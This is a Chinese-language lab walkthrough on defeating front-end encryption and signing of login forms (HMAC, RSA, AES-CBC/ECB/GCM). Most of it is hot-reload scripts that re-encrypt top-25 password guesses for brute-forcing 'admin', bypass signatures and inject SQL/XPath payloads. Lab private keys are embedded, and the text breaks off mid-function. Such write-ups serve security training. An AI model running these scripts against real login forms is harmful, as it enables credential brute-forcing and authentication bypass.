高级前端加解密与验签实战
一、前端验证签名(验签)表单:HMAC-SHA256
使用hmac-sha256的十六进制key值可以加密
与页面加密后的值相同
热加载:
encryptData = func(p) {
//sha256key值
key = codec.DecodeHex("31323334313233343132333431323334")~
//账号密码
username = ["admin"]
password = x"{{x(pass_top25)}}"
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = f`username=${uname}&password=${passwd}`
//结果=十六进制编码(ase256编码)=sign结果值
result = codec.EncodeToHex(codec.HmacSha256(key, message))
//m为整个请求体
m = {
"signature" : result,
"key" : "31323334313233343132333431323334" ,
"username" : uname,
"password" : passwd
}
i = json.dumps(m)
resultlist.Append(i)
}
}
return(resultlist)
}
二、[前端验证签名(验签)表单:先 HMAC-SHA256 再 RSA
首先对需要加密的内容sha256加密后根据给出的publickey加密在转为十六进制即可获取sign
替换可绕过签名
热加载:(注:publickey每次启动时会更改)
encryptData = func(p) {
//sha256key值
key = codec.DecodeHex("31323334313233343132333431323334")~
//账号密码
username = ["admin"]
password = x"{{x(pass_top25)}}"
pubulickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAngHo3NyLc95Rmo5uzCih
mJwHciTdsSr/NNm3e9GqFmNMajqq8iDYLzPuqcG1Tzr1gA0D0xkXPGetzzqMOkPZ
mvO/l+JwuAMiP3kO9CUaOCBOM6CARC0Iaa59Nz/kX/qXd3VoPHVOyqDr3U0oTKVU
o6GVJUpNB14v5QD/IXRZFQHiHaH/SfjJsK+j9VtZQaPGl2ircKbNFC8I3OTA1rK3
DsnTfsBp7I5LERV/8J7L24xOnnNX1a5FuxK5VN4zb5VMduytULIYrc2XxE93WMCN
/cVQc8vpO8UkxCqL25eV2ZYV47obv/YF/2dg/pVnLZfvqTpkX3m98J7Wsnv+mTpt
NwIDAQAB
-----END PUBLIC KEY-----`
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = f`username=${uname}&password=${passwd}`
//结果=十六进制编码(rsa(hex(ase256编码)))=sign结果值
result = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(pubulickey, codec.EncodeToHex(codec.HmacSha256(key, message)))~)
//m为整个请求体
m = {
"signature" : result,
"key" : "31323334313233343132333431323334" ,
"username" : uname,
"password" : passwd
}
i = json.dumps(m)
resultlist.Append(i)
}
}
return(resultlist)
}
第二种:
encryptData = func() {
key = "1234123412341234"
dump(key)
publicKey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzEHpYzW8tXIHUNwTnZXj
8Vz9MBX1/Jb6TdRw6v2FPkJ3UlobiHgzUn/LMcC8L9wKMFQvA3h88ij3GNgH4iED
1iJzHhhc0FCG9HGQK4JgDwPzrwW7JCoL7OyjJ6EBVND4ETMXBnm2s0DJnt4zrMGN
ZSyNoEtfJaNHOm0ZZFTgi1ON/bdfVIOhVgZFbDZWJUVyPbStGaoT5gIj8HgC866d
I997i82jzk3Urou1a11jHvUB4ZL5mwrdawPsC7eok9h6M4iRFLYPmmay1NYCdr5G
GC1x6idk73/vXx7f9Y6+gQVhsKmOCQOQeE4kGhzs+3m000yOiMUb520T1HYER6SD
PwIDAQAB
-----END PUBLIC KEY-----`
data = "username=admin&password=123456"
signature = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(publicKey, str(codec.HmacSha256(key, data)))~)
body = f`{"signature": "${signature}","key": "31323334313233343132333431323334","username": "admin","password":"123456"}`
dump(body)
return body
}
beforeRequest = func(rsq) {
body = encryptData()
return poc.ReplaceBody(rsq, body /*type: []byte*/, false /*type: bool*/)
}
三、CryptoJS.AES(CBC) 前端加密登陆表单
解密:base64 --> aes-cbc
加密:aes-cbc --> base64
加密后与表单加密data相同
解密:
热加载爆破
热加载:
encryptData = func(p) {
//aes-cbc,密钥和偏移量
key = codec.DecodeHex("31323334313233343132333431323334")~
iv = codec.DecodeHex("e90599cc4a0915b0250ed11f70ca4c58")~
//账号、密码
username = ["admin"]
password = x"{{x(pass_top25)}}"
//定义列表遍历resultlist[]
resultlist = []
//for循环嵌套,排列组合生成账号密码
for uname in username {
for passwd in password {
//定义message内容为被加密参数以及参数值
message = {"username":uname,"password":passwd}
//对message转为json格式
i = json.dumps(message)
//对i进行cbc加密,默认 PKCS7Padding填充,后base64加密
result = codec.EncodeBase64(codec.AESCBCEncryptWithPKCS7Padding(key, i, iv)~)
resultlist.Append(result)
}
}
return resultlist
}
四、CryptoJS.AES(ECB) 前端加密登陆表单
无需偏移量只需密钥即可加解密
解密:base64 --> aes-ecb
加密:aes-ecb --> base64
解密:
加密:与表单data加密内容相同
热加载爆破
热加载:
encryptData = func(p) {
//aes-ecb 只需密钥不需要偏移量
key = codec.DecodeHex("31323334313233343132333431323334")~
//账号、密码
username = ["admin"]
password = x"{{x(pass_top25)}}"
//定义列表resultlist,使其组合生成的json格式字符串存入resultlist
resultlist = []
//for循环嵌套,排列组合生成账号密码
for uname in username {
for passwd in password {
//定义message,格式为加密内容格式
message = {"username":uname,"password":passwd}
//dump为json格式传入i
i= json.dumps(message)
//ecb后base64
result = codec.EncodeBase64(codec.AESECBEncryptWithPKCS7Padding(key, i,nil)~)
resultlist.Append(result)
}
}
return resultlist
}
五、CryptoJS.AES(ECB) 被前端加密的 SQL 注入
与上述四题同理,只不过加入了sql注入
相同加解密手法即可
如果需要请求包解密的话需要beforeRequest可查看最后一题
热加载爆破:
热加载:
encryptData = func(p) {
//aes-cbc-sql注入
key = codec.DecodeHex("31323334313233343132333431323334")~
//账号、密码
username = x"{{x(xpath-injection)}}"
password = x"{{x(pass_top25)}}"
//定义resultlist列表,将for嵌套循环的json格式输入进列表中
resultlist = []
//for循环嵌套,排列组合生成账号密码
for uname in username {
for passwd in password {
//定义message来设定加密内容格式
message = {"username":uname,"password":passwd}
//dump为json格式
i = json.dumps(message)
//将message加密ebc
result = codec.EncodeBase64(codec.AESECBEncrypt(key, i, nil)~)
resultlist.Append(result)
}
}
return resultlist
}
六、CryptoJS.AES(ECB) 被前端加密的 SQL 注入(Bypass认证)
和第五关相似可直接用第五关热加载万能密码绕过
七、AES-ECB 加密表单(附密码)
解密:base64 --> aes-ecb
加密:aes-ecb --> base64
替换data解密成功
热加载爆破
热加载:
encryptData = func(p) {
//aes-ecb 无需偏移量
key = codec.DecodeHex("31323334313233343132333431323334")~
//账号、密码、年龄
username = ["admin"]
password = x"{{x(pass_top25)}}"
age = 123
//定义resultlist列表,将转化的json格式字符串输入
resultlist = []
//for循环嵌套排列组合
for uname in username {
for passwd in password {
//定义message 为固定加密内容
message = {"username":uname,"password":passwd,"age":age}
//将message循环后的字符串dump成json格式
i = json.dumps(message)
//加密
result = codec.EncodeBase64(codec.AESECBEncrypt(key, i, nil)~)
resultlist.Append(result)
}
}
return resultlist
}
八、RSA:加密表单,附密钥
提供了publickey和privatekey
也可base64解出公私钥
解密:base64 --> RSA-OAEP sha-256
加密:
替换后前端解密成功
热加载爆破:
热加载:
encryptData = func(p) {
//前端RSA-OAEP无需填充
publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tV/wzS3Lu27BeeDL6ih
m1NHqiMiO7XtHA81iaYw4LAx/GcuTtCoEkTm816K6aKxCCqMnr3Ge3tPWiKnidfI
10pZyA0f48oi/AtmTp5IC5xKi/kY79YUTwzphe36jWQ6DnIOr60XCyj2Ln6Pt8UE
PJG5mYnxnY4Mh5hK+mSysod13BbtRHslpeIZ0VrN8uE7qy68DnWvAYzJfaCjOlIz
BLMULq+8RXHsVqS1M6IarKx++hcPlZHjh6NADR+XUByOhpWdwQhmLeOxJxUuXtXB
OHiBUaGfdsYSHRSRJs91roLtw0cp4CdjT+6mMlWjVNyPlfyJigOaq5Ui6BfOjKg9
hwIDAQAB
-----END PUBLIC KEY-----`
//账号、密码、年龄
username = ["admin"]
password = x"{{x(pass_top25)}}"
age = "123"
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = {"username":uname,"password":passwd,"age":age}
//dump为json格式传入i
i = json.dumps(message)
//结果=base64(rsa加密)=sign结果值
reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)
resultlist.Append(reslut)
}
}
return resultlist
}
九、RSA:加密表单服务器传输密钥
访问密钥链接
第八题热加载爆破,解密与第八题相同
十、RSA:加密表单服务器传输密钥+响应加密
相同获取密钥方式
解密与上题相同
解密响应包
热加载与上述RSA相同
encryptData = func(p) {
//前端RSA-OAEP无需填充
publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0taak0t06jYBxOlICEsG
39Ey37KXbHVBuo0D+KN4iQcTow0BSGgIacNviJzwf8cSKJA/6O1jM4IeRkbDZ2BP
C8/8uIB0C9HdivdQmNpBMEluTnyvrjHmO40J/FkZ2MSYNzSKuZd81+CxkCftuKEn
LOI5zzqxEk2grACKH06lPs9GuMeGvznn8nzIyqy7xWlJdKXOXRUTwLnjNag5KTCD
6N5gcET1MPCGW71sEQ0HUvePfyZ4AN4Vq7DZRtQ7LGMPHJ/kB1z0qxrYfikwXCFd
sCcnckcFCC/2+DaL4MklpJSlb5b59aC4WGmS+V/qUOf8YzK6zRDtdfe4Cu2vWwui
kwIDAQAB
-----END PUBLIC KEY-----`
//账号、密码、年龄
username = ["admin"]
password = x"{{x(pass_top25)}}"
age = "123"
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = {"username":uname,"password":passwd,"age":age}
//dump为json格式传入i
i = json.dumps(message)
//结果=base64(rsa加密)=sign结果值
reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)
resultlist.Append(reslut)
}
}
return resultlist
}
解密响应包:
序列使用:
设置后提取响应包内公钥,同理获取私钥
两种热加载方式:
序列
var PRIVATE_KEY = `-----BEGIN RSA PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDkbHvHkoa146Np
/8e6Qs10mriMNGZuu7vHLWt76sV9p4ZAyb4dcv6xjdZMD4fwJJe9ONazy0U///wM
ROvVe/YaeDejAk1CPmm2p3jnPcC7g7AbwSbODQuVVx0OdFu1fM0fN4C/gu3pdC/S
LP1gYbNnzCRvjEpGwHPumrWGJdt0YrzfG24mdmK8ODT7k/t2dkts6HxcT8BLBOAj
opcKSVSlnE4sbmSkcWvn1FV4hDcNBVFjyNyjrwDh4Cl4s7gzEwDl9N7+HRU6qYtM
aJ6ZNCrxk9nbURTrigS0s5Z51lMAf2IVjVtkNC2r/UxTSKU/i8BA0xDaB0FkW3Os
btVojOi3AgMBAAECggEAIIozt+JvvkmHZfpCAY6ypgHEeHSegvfLcDxQK37uU1Ai
F+ilZJyVG8YQ2RT9UIBl/VazfzldzBgzV6wZzHe0P2EQy+/wAZfSh2qkFoz9f7jq
xYlmdcP1+nhGc2CwD9KPhfrqJF4Kdk9O4Kn4Dlrcq9Sw/BMIIbwYx8zSPyH1eUay
p2vv5KpYcdlKO+6dobuqIgL6c2qkQN5pJ9iO7xKIdD1nX0lUXRs/Sokttq03JwX6
uX3VUrf6pUl6mvTKF6AC2q793UyqBNbaLSiU03VaV+6tjV7ko+i4cNLhqMmfnNdO
QoMGdPSwzKLxQPCdfYjnMtzIl/gmnqoi9wHzYXUoAQKBgQD3GBwJQdnvdiSiGq9e
fQoZ9Y51XrCmUSwwKROayaLTaSO6CjSs40DQh4uV+eHOp+Ire4yg03euYfigvwPC
k5epG4dNG5pMi8vLLFLxaZshHjJ1Ul4IlBdLig5Kp10HieVom3NxSJCw+R61xlfw
95bdWoBJKWQ+UO6HurKLWjy4gQKBgQDsqBsNkaEi3u1KyIUlaQtYy+MCNWuPPY60
ohtpuetmEYi2cg4u6ciBxWYi3xM4rSr/UDMNgxLCq6odVXQnTEjSH33JtJgUwwYk
C9PP9E8sHwieVidr6IV4MSK0lBV46gSAVk8xnyv+huTJxpUNZPT51HIN+eJyi9Ys
L+aPuIbFNwKBgCmC0WL0vyotjOX22bNkCkhmKnKpX7/xLx1AKVz9tu8RYMEmaccJ
vp/JxbeCbV8McUCg1vVF0XtoVh6bOIR9yyLLzyUzF+74JVqSrbSE61za99sh5U5H
oso7/T6pc0WK8xFp3DER4cz5bSFYmvmOfrfdNmQUIhUd/5Sp1sj2dfEBAoGBANCq
4T+zmrseiWiZKh10Y9bl38IAzFg+1Oec0EMG9fLHnx4Pr0XaSTtzjL1OqKoetnzs
gDd3zUDtEFBRGtvTvZnYvpbtr/MOiwmZjCgeqPikXHsQSC4zlgwGdy12LQCyh0mJ
0MZWLPp+gpkPijmHPSJUGkUMgoixmCTaD5fGAr89AoGBALbWdQz8xDBDTFjO4Bz4
dy6XL1Fsxl3kc9WHlvRJEzjiZjS99GmzFaUK88PiONx1t3DtaqWhujin3TXf3D9N
JUcZUWwmhYdgmoiAz/ryro9qJO/gCzUuBT0HOzq5l9Wh4msRs3j1ow4MvsEjCr1x
WGtpNwl1sPaB+VuwVXX5hUnK
-----END RSA PRIVATE KEY-----
`
decryptData = func(packet){
body = poc.GetHTTPPacketBody(packet)
jsonbody = json.loads(body)
data = codec.DecodeBase64(json.loads(body).data)~
data = codec.RSADecryptWithOAEP(PRIVATE_KEY, data)~
data = string(data)
body = json.ReplaceAll(jsonbody, "$..data", data)
body = json.dumps(body)
return poc.ReplaceBody(packet, body, false)
}
encryptData = func(p) {
//前端RSA-OAEP无需填充
publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5Gx7x5KGteOjaf/HukLN
dJq4jDRmbru7xy1re+rFfaeGQMm+HXL+sY3WTA+H8CSXvTjWs8tFP//8DETr1Xv2
Gng3owJNQj5ptqd45z3Au4OwG8Emzg0LlVcdDnRbtXzNHzeAv4Lt6XQv0iz9YGGz
Z8wkb4xKRsBz7pq1hiXbdGK83xtuJnZivDg0+5P7dnZLbOh8XE/ASwTgI6KXCklU
pZxOLG5kpHFr59RVeIQ3DQVRY8jco68A4eApeLO4MxMA5fTe/h0VOqmLTGiemTQq
8ZPZ21EU64oEtLOWedZTAH9iFY1bZDQtq/1MU0ilP4vAQNMQ2gdBZFtzrG7VaIzo
twIDAQAB
-----END PUBLIC KEY-----`
//账号、密码、年龄
username = ["admin"]
password = x"{{x(pass_top25)}}"
age = "123"
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = {"username":uname,"password":passwd,"age":age}
//dump为json格式传入i
i = json.dumps(message)
//结果=base64(rsa加密)=sign结果值
reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)
resultlist.Append(reslut)
}
}
return resultlist
}
// 修改响应包
afterRequest = func(rsp){
return decryptData(rsp)
}
mirroHTTPFlow
//加密
encryptData = func(p) {
//前端RSA-OAEP无需填充
publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoEpQP1HQ2CDllubw30U2
6UBmhyjE3QHxkvD3kpIOzVFnKG3xY6rDNOfi4x9mzREcrSO8P0myuRaIjNrVo3wx
sAVe0meVPgVG1g1D2bQawNAeLVhJLjQBgPGSYGyh/olJBvQAVGITIxi5U81Lr2Rv
I8rBG0jDmH1tA4gE9CNTX780eUzOL6OTs7gC4vTeAGtHqeGmRnF8zghI6tDOYT4F
CRwyRvEx4aOJx5kJaaxfmXmG4bF5T6/OTJSlAPm/Xr+tWZJ2+/BPGpw4BEWx+bfy
P5cq5OpVJqIJhkbU3hsgK2m9A/yQcNcVhAzAu0gOep33/W7x9282fdxQ1tktIh4q
bQIDAQAB
-----END PUBLIC KEY-----`
//账号、密码、年龄
username = ["admin"]
password = ["admin"]
age = "123"
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = {"username":uname,"password":passwd,"age":age}
//dump为json格式传入i
i = json.dumps(message)
//结果=base64(rsa加密)=sign结果值
reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)
resultlist.Append(reslut)
}
}
return resultlist
}
mirrorHTTPFlow = func(req,rsp, packet) {
// 获取私钥以解密响应数据
pem = packet.privatekey
// 切割响应中的数据,作为 JSON 加载
_, body = poc.Split(rsp)
body = json.loads(body)
// 获取响应中加密的部分data,切割后的响应数据作为body,获取其中data参数,后通过base64(rsa)解密得到明文data返回值
data = codec.RSADecryptWithOAEP(pem, codec.DecodeBase64(body.data)~)~
return string(data)
}
十一、前端RSA加密AES密钥,服务器传输
解密:rsa解密aes的key,iv,后aes解密
aes(key,iv)=rsa(base64)
result=base64(aes-gcm)
其中存在RSA加密的AES的key和iv
解密:key
解密:iv
响应包key:
响应包iv:
为AES-GCM加密
热加载:
encryptData = func(p) {
//RSA加密AES密钥和偏移量
//公私密钥
publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAngHo3NyLc95Rmo5uzCih
mJwHciTdsSr/NNm3e9GqFmNMajqq8iDYLzPuqcG1Tzr1gA0D0xkXPGetzzqMOkPZ
mvO/l+JwuAMiP3kO9CUaOCBOM6CARC0Iaa59Nz/kX/qXd3VoPHVOyqDr3U0oTKVU
o6GVJUpNB14v5QD/IXRZFQHiHaH/SfjJsK+j9VtZQaPGl2ircKbNFC8I3OTA1rK3
DsnTfsBp7I5LERV/8J7L24xOnnNX1a5FuxK5VN4zb5VMduytULIYrc2XxE93WMCN
/cVQc8vpO8UkxCqL25eV2ZYV47obv/YF/2dg/pVnLZfvqTpkX3m98J7Wsnv+mTpt
NwIDAQAB
-----END PUBLIC KEY-----`
privatekey = `-----BEGIN RSA PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCeAejc3Itz3lGa
jm7MKKGYnAdyJN2xKv802bd70aoWY0xqOqryINgvM+6pwbVPOvWADQPTGRc8Z63P
Oow6Q9ma87+X4nC4AyI/eQ70JRo4IE4zoIBELQhprn03P+Rf+pd3dWg8dU7KoOvd
TShMpVSjoZUlSk0HXi/lAP8hdFkVAeIdof9J+Mmwr6P1W1lBo8aXaKtwps0ULwjc
5MDWsrcOydN+wGnsjksRFX/wnsvbjE6ec1fVrkW7ErlU3jNvlUx27K1QshitzZfE
T3dYwI39xVBzy+k7xSTEKovbl5XZlhXjuhu/9gX/Z2D+lWctl++pOmRfeb3wntay
e/6ZOm03AgMBAAECggEAKvzOA7ik4AMuJGR31GeBf2mDxRQulFLkV9abyr4CDlE5
qvUHKRSyfDUey2R+FW4u+IWR8s6yuaZjbSu6lud6vmNuTr42eHmxyZ7/6IBnn7l6
TSVvgBzYWxgzzOI/GbWtm7x/fWNU6l/Zi73AJwob+uCtGRYb2tNPKHia8Nkcm1AY
atJ3mrgb9fx6CeSW4y6VU1Gq7iSIn7NFMaRnS6v+cvV3ILCFJ3uNq+8/APe9AGCD
imiGDNOlDw76QkmabD4m9rS+BzGOMYXFGEW55e99oKk+fKqSIV+GDvqTRoBUQcnd
4soEiVXcGQ66t0nV6ilJ8d/xh3B9HGX3BHk4FJWM4QKBgQDIppSwV/ojz7rvtJSn
k79cKxMD04kSQkjHh/VKcT4GE6h45l+6zcR7KBqyQKNeIcMwSwMm1vMaBBOKYVz2
K4UW7PrtiIvrBvpqeglVKLghWladared7yDvKEHFGik1QXWBHN+GvhntvHRJeCPI
qVKBynbhp1UOK6TlC4NF/gar2QKBgQDJl/nj9mRvZ14XFkSZ2TtUqHrHzoPGMB3z
YmioY6DTVwWG9WviqjFQw7jqkoJdJ7dQ4YW4turtMNY3Sg5HxyuzjztzoPyqD6M2
gdsM6ghuPoq1l6p+h2YMVmEtbWLZ+T3njfgylE3JxLuAbFVYggr2bNJWIf0qfMUO
4OM73kmHjwKBgQCGvV4xwRJng/JrT19X3N5u3ToKor10NnC7FLCCSeM1n3PNpB36
yny7myW6N6+84X06a9T0+vkKqlwY2+LaKEVaLM8gPUaAEBKO995Wgl6LfyeU0/nz
o4YBM45e9n9flNJ8XlA4ImY1AA0y3Otir1mJcNU+GOkD+AjmCkIf+UKvmQKBgEOE
0T9WwODHIC5fWO6mYUbDfwv40Q3KA94GccMkSzM9jC5deJrcIdRJGWAHXf5RVQaT
4jOxoBF9L+IovYuw26QyLtlVbAqRXjrdVz6GC/jQnaigeYwTUUyEidurLVaQMfmi
BST7ouoXKC2lGxifxYgvfms2yxI149JN5A2jL8FlAoGARsUjJP/DvdDGEVlsNbDB
UnUKxT8aWtxtPLKQfTUla/T7AEtwysUO3bog27aXptWIzx5lNQs+w9Gum2QfiuEx
naUe50VJfQODPYOWMAfPRfXycMcImSlNq/RpP3b73ABKak3GAoGrDPbCZKZ/PfhL
TRNkegCNcIzDs03dmw+xUVE=
-----END RSA PRIVATE KEY-----`
//账号、密码、年龄
username = ["admin"]
password = x"{{x(pass_top25)}}"
age = "123"
//AES密钥和偏移量解密,RSA(publickey,base64)
key = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("H5N2T9QqHedusVO1wa+8DOOcAUN+T0A1cIEhyi93bkKVbEvfFsoFx67ZOTYVyRiSUDEfnC91QgJJnX6Cu2KhkgnwzJXaqDhXuUKvyRvcackSCvBCKbkuqQhguNEITQh0Qw6TqkKpC5x74JNEb5MKZ9/LqqtcA0clVteqS3m9KYx/+93rfQ7yqlPPh87dtSSCmYHw32uKe1u+/eRDofp8Oe/XJlyUa6AIAJ21jo2vt2L2NHoqItnG82xmLrweSoe1U9HBYKDOY1JrO1D/n8GLB9uZPcyBgGm/fSCM02JaMrTuSJdyEQlVuya0rTafVtEbQVtEt0uHbycV1c+7ou96EA==")~)~
iv = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("XOAFlHCWYhVbNO8ffnUS2CM400QCwoucjLOLiqhVDALw5DqpKeQpFfkt44h8alHX1Gx/JMxYNWVGOcA26leSclkah3NS1FC9CxLOWhUjhnHXwpS11iSIksoozEVqKOz4cOFDU/ysK59TYXZ7D3ymtUnRd1Op2C1j8ghDpS8+RoaXazfKahBFY7msfGPA3mNxdezcmuhKdVKdQa/BIYRdq/C3jY2SmbHByVgAYC4audPzM11z1SrLF4QVYnhc50rEVnjI1yo3E+49GJ8/0dpBIwQByrc5vwzzq8lu/uStBZ7XZJ0yk+K9gxp6SgKLPzp/8qksZZeY4czLzUYxadX4eQ==")~)~
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = {"username":uname,"password":passwd,"age":age}
//dump为json格式传入i
i = json.dumps(message)
//结果=base64(AES-CGM-size12加密)=sign结果值
reslut = codec.EncodeBase64(codec.AESGCMEncryptWithNonceSize12(key,i,iv)~)
resultlist.Append(reslut)
}
}
return resultlist
}
热加载爆破:
解决http响应加密问题:
序列+mirro方式:
(可固定key+iv或是拟定或随机key和iv对encryptedIV、encryptedKey、data进行加密来达到效果)
获取公钥加密,获取私钥解密
同理提取响应包内容
热加载:
encryptData = func(p) {
//RSA加密AES密钥和偏移量
//公私密钥
publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoEpQP1HQ2CDllubw30U2
6UBmhyjE3QHxkvD3kpIOzVFnKG3xY6rDNOfi4x9mzREcrSO8P0myuRaIjNrVo3wx
sAVe0meVPgVG1g1D2bQawNAeLVhJLjQBgPGSYGyh/olJBvQAVGITIxi5U81Lr2Rv
I8rBG0jDmH1tA4gE9CNTX780eUzOL6OTs7gC4vTeAGtHqeGmRnF8zghI6tDOYT4F
CRwyRvEx4aOJx5kJaaxfmXmG4bF5T6/OTJSlAPm/Xr+tWZJ2+/BPGpw4BEWx+bfy
P5cq5OpVJqIJhkbU3hsgK2m9A/yQcNcVhAzAu0gOep33/W7x9282fdxQ1tktIh4q
bQIDAQAB
-----END PUBLIC KEY-----`
privatekey = `-----BEGIN RSA PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCgSlA/UdDYIOWW
5vDfRTbpQGaHKMTdAfGS8PeSkg7NUWcobfFjqsM05+LjH2bNERytI7w/SbK5FoiM
2tWjfDGwBV7SZ5U+BUbWDUPZtBrA0B4tWEkuNAGA8ZJgbKH+iUkG9ABUYhMjGLlT
zUuvZG8jysEbSMOYfW0DiAT0I1NfvzR5TM4vo5OzuALi9N4Aa0ep4aZGcXzOCEjq
0M5hPgUJHDJG8THho4nHmQlprF+ZeYbhsXlPr85MlKUA+b9ev61Zknb78E8anDgE
RbH5t/I/lyrk6lUmogmGRtTeGyArab0D/JBw1xWEDMC7SA56nff9bvH3bzZ93FDW
2S0iHiptAgMBAAECggEAXDTjnMkv3mRuLjSDc6yZPeyyDiZBuPEZSnIbuNEUer/N
G9DC/5aH3LNYLVcvB+BEIsVf0PhQO3De9EgehYE4BA3S0i6MB7V5XkEbOu0ERs5x
zZvv3QhFpStSDO3w8j9/JuTOG7yfTZ03XyHF3Atmc6x7EXr2KY5dW56vWtHHcFfg
XMRviQkysLEPtQIIsyq3qU8DZ0TC44IWk903PohyJkbT0JyrxvcS1fl40CTUo+v3
Lr8PLKk3J9A2FXw87gqiSLaOUkDBnG02bhmMlF8HcQLBuxNnY7w9H95uipFl0kEQ
tupf/QOhY4hBS1/Ek+cV0I5TLD0z92bz/YYDgf5HgQKBgQDDShfP9X8NhHBI4iy1
wgZ/Xrxtaeea1MPfDlnv6aF+voVV46iwWJb50+Ydl8UJ+KTIYvirYr67fT3+YoeY
zTMHrRBWZI2wdtTJTRZbqBSYTux9/CQI4zIyIAfQnpmRTm30SyHaP5DInRAcYBsp
t6uNIn2GRkvEVtuw1OSKVwLR2QKBgQDSHtmlV/0PVsZvBb2bWOhVwIVC7EqUwDiH
lxE8UB7JtzPlb79ILA4LQmlnA9DdyQbBTSndrmmeaiNNWo2Da1Xw6p8khjmpHb5X
TofW3NhRcC0rVcRoMQ0FWz+m8MOxxLxQXkaiCuXHN7NallOZeKJw/wpGi1qVPcV4
gtoXgfKstQKBgGbaGvh3v1aLLef01r9TVMC4UFz/re8pp49Oq6djUJ7EEM1PfYSC
4+Dn7QYg7LF3trGjDnyVIQb1yzSzB98+E2Yzi6s0gjsyGpd6dhAH0fD1gDBKH2Be
6AzmObdyEEcrG1XSTB355HMD5XxMUYIDLeLDC4EwfK8HX+Ud+s+xS9bhAoGBAKcQ
uGRqzV7A1A26NsOpsTFdXZeUYMhc/ZVxW9bkrVYdQDoQ27n6rT/ukffCZPOyvpg7
TipgXsICCgebFCGF2lMveVGFF5uLdqfcXM1N0wENfByUmRFuzrePkdCeZjqV/lS4
YNi+aWw4sXY5SEciT6YgYn8sld1LvBLRl65ROC5xAoGBALRSAbI9+Yci4JTidajy
+a6RBbnZxW21tR2xdgyBxlCaNXs3obc9tNL/AjKRSGhmqDfnW0Dk+LiaeJhjLpIX
ModQwzJH5RTa2fY4qYmx4O7vzBopxVMCVtohqn5Mqlp0KL/gQP2G3szgYaB/Z8Zv
ia2VCm3zykblsoSn8gzUo3DA
-----END RSA PRIVATE KEY-----`
//账号、密码、年龄
username = ["admin"]
password = ["admin"]
age = "123"
//AES密钥和偏移量解密,RSA(publickey,base64)
key = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("YrtvJREhDaJjsf3pU5pfMV/u5zt/ZgNiZArRs+upWc4t1PQaAGWvOZm+dJlKh6whRhqRDcFLBvBr8PqiAIDmBqTKBETBjwnObBI2jz/wzULzvEpHkUodR6pQCX5RqRftfTStXoKVe3kfgQKduU5XTtlFXTlQqqQXeuEn0u9Vu/W/mOL0qo5gpSOfjBujxGVbjHCMILUJvX9LnpJhdTBFIyka7R9gJWxJPQm+Bko17Aa2R8a+DXAIpRYx+3LlS5KLodopF7EAJ8ZB+XPrbQGzQnxiJ7ZR2/vWEM0yRcFBZCw68Yi2S/9So9DTooSXrDQp3C8dc/6n3voI6zqB1TzH9w==")~)~
iv = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("L8A6ty9EwGl3itWZ++Gi0dqa1znNtMBYcHBu8mvEsFdxOKzB45czIL44mjr1kKR/eei2qpGJamv6KcKQT3wu+y5mZ2xFxgGo3ZD+hBQBR8uu7I2IjqEt7Av2Auhy59wModn8Y1MSebRSo8uLK3SSL7rKKd5Om48GU7AbQH6uyCp33L2zZsvdacHFHdR92nQsGEu4R4VOH9Zrxe9bCGUd10Yc/u1UsJ30D3y8WXu9kRqlA/XmyK1mk5M1ImNF0pd0vdq/DWtlb6+95Z9EH4biP1A7BD/8Dx2amZWfW8KqKJjBXIHONoVllnFhOkqjYQJsWS+qoDVQTVar9ChEw8k6Gw==")~)~
//定义列表变量resullist
resultlist = []
//for循环嵌套username、password排列组合
for uname in username {
for passwd in password {
//定义message:为加密前的参数格式
message = {"username":uname,"password":passwd,"age":age}
//dump为json格式传入i
i = json.dumps(message)
//结果=base64(AES-CGM-size12加密)=sign结果值
reslut = codec.EncodeBase64(codec.AESGCMEncryptWithNonceSize12(key,i,iv)~)
resultlist.Append(reslut)
}
}
return resultlist
}
mirrorHTTPFlow = func(req,rsp, packet) {
